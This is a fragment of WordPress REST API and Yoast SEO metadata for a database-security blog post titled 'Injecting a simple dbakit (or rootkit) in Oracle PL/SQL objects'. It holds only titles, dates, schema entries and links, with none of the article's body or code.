Availability\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/#\\\/schema\\\/person\\\/28a44ca3a6633fe4156ad1ea209d40a9\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/#\\\/schema\\\/person\\\/28a44ca3a6633fe4156ad1ea209d40a9\",\"name\":\"DBA RJ\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/wp-content\\\/uploads\\\/2019\\\/09\\\/RodrigoJorgePOUG19.png\",\"url\":\"https:\\\/\\\/www.dbarj.com.br\\\/wp-content\\\/uploads\\\/2019\\\/09\\\/RodrigoJorgePOUG19.png\",\"contentUrl\":\"https:\\\/\\\/www.dbarj.com.br\\\/wp-content\\\/uploads\\\/2019\\\/09\\\/RodrigoJorgePOUG19.png\",\"width\":712,\"height\":712,\"caption\":\"DBA RJ\"},\"logo\":{\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/wp-content\\\/uploads\\\/2019\\\/09\\\/RodrigoJorgePOUG19.png\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Injecting a simple dbakit (or rootkit) in Oracle PL\/SQL objects - DBA - Rodrigo Jorge - Oracle Tips and Guides","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.dbarj.com.br\/en\/2018\/12\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\/","twitter_misc":{"Written by":"DBA RJ","Est. reading time":"11 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.dbarj.com.br\/en\/2018\/12\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\/#article","isPartOf":{"@id":"https:\/\/www.dbarj.com.br\/en\/2018\/12\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\/"},"author":{"name":"DBA RJ","@id":"https:\/\/www.dbarj.com.br\/en\/#\/schema\/person\/28a44ca3a6633fe4156ad1ea209d40a9"},"headline":"Injecting a simple dbakit (or rootkit) in Oracle PL\/SQL objects","datePublished":"2018-12-05T10:50:14+00:00","dateModified":"2019-01-02T13:00:06+00:00","mainEntityOfPage":{"@id":"https:\/\/www.dbarj.com.br\/en\/2018\/12\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\/"},"wordCount":742,"commentCount":2,"publisher":{"@id":"https:\/\/www.dbarj.com.br\/en\/#\/schema\/person\/28a44ca3a6633fe4156ad1ea209d40a9"},"image":{"@id":"https:\/\/www.dbarj.com.br\/en\/2018\/12\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\/#primaryimage"},"thumbnailUrl":"https:\/\/www.dbarj.com.br\/wp-content\/uploads\/2018\/12\/seguranca_hacker_ciber.jpg","articleSection":["Database Security"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.dbarj.com.br\/en\/2018\/12\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/www.dbarj.com.br\/en\/2018\/12\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\/","url":"https:\/\/www.dbarj.com.br\/en\/2018\/12\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\/","name":"Injecting a simple dbakit (or rootkit) in Oracle PL\/SQL objects - DBA - Rodrigo Jorge - Oracle Tips and Guides","isPartOf":{"@id":"https:\/\/www.dbarj.com.br\/en\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.dbarj.com.br\/en\/2018\/12\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\/#primaryimage"},"image":{"@id":"https:\/\/www.dbarj.com.br\/en\/2018\/12\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\/#primaryimage"},"thumbnailUrl":"https:\/\/www.dbarj.com.br\/wp-content\/uploads\/2018\/12\/seguranca_hacker_ciber.jpg","datePublished":"2018-12-05T10:50:14+00:00","dateModified":"2019-01-02T13:00:06+00:00","breadcrumb":{"@id":"https:\/\/www.dbarj.com.br\/en\/2018\/12\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.dbarj.com.br\/en\/2018\/12\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.dbarj.com.br\/en\/2018\/12\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\/#primaryimage","url":"https:\/\/www.dbarj.com.br\/wp-content\/uploads\/2018\/12\/seguranca_hacker_ciber.jpg","contentUrl":"https:\/\/www.dbarj.com.br\/wp-content\/uploads\/2018\/12\/seguranca_hacker_ciber.jpg","width":625,"height":469},{"@type":"BreadcrumbList","@id":"https:\/\/www.dbarj.com.br\/en\/2018\/12\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.dbarj.com.br\/en\/"},{"@type":"ListItem","position":2,"name":"Injecting a simple dbakit (or rootkit) in Oracle PL\/SQL objects"}]},{"@type":"WebSite","@id":"https:\/\/www.dbarj.com.br\/en\/#website","url":"https:\/\/www.dbarj.com.br\/en\/","name":"DBA - Rodrigo Jorge - Oracle Tips and Guides","description":"Blog about Databases, Security and High Availability","publisher":{"@id":"https:\/\/www.dbarj.com.br\/en\/#\/schema\/person\/28a44ca3a6633fe4156ad1ea209d40a9"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.dbarj.com.br\/en\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":["Person","Organization"],"@id":"https:\/\/www.dbarj.com.br\/en\/#\/schema\/person\/28a44ca3a6633fe4156ad1ea209d40a9","name":"DBA RJ","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.dbarj.com.br\/wp-content\/uploads\/2019\/09\/RodrigoJorgePOUG19.png","url":"https:\/\/www.dbarj.com.br\/wp-content\/uploads\/2019\/09\/RodrigoJorgePOUG19.png","contentUrl":"https:\/\/www.dbarj.com.br\/wp-content\/uploads\/2019\/09\/RodrigoJorgePOUG19.png","width":712,"height":712,"caption":"DBA RJ"},"logo":{"@id":"https:\/\/www.dbarj.com.br\/wp-content\/uploads\/2019\/09\/RodrigoJorgePOUG19.png"}}]}},"_links":{"self":[{"href":"https:\/\/www.dbarj.com.br\/en\/wp-json\/wp\/v2\/posts\/3881","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.dbarj.com.br\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.dbarj.com.br\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.dbarj.com.br\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.dbarj.com.br\/en\/wp-json\/wp\/v2\/comments?post=3881"}],"version-history":[{"count":0,"href":"https:\/\/www.dbarj.com.br\/en\/wp-json\/wp\/v2\/posts\/3881\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.dbarj.com.br\/en\/wp-json\/wp\/v2\/media\/3899"}],"wp:attachment":[{"href":"https:\/\/www.dbarj.com.br\/en\/wp-json\/wp\/v2\/media?parent=3881"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.dbarj.com.br\/en\/wp-json\/wp\/v2\/categories?post=3881"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.dbarj.com.br\/en\/wp-json\/wp\/v2\/tags?post=3881"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}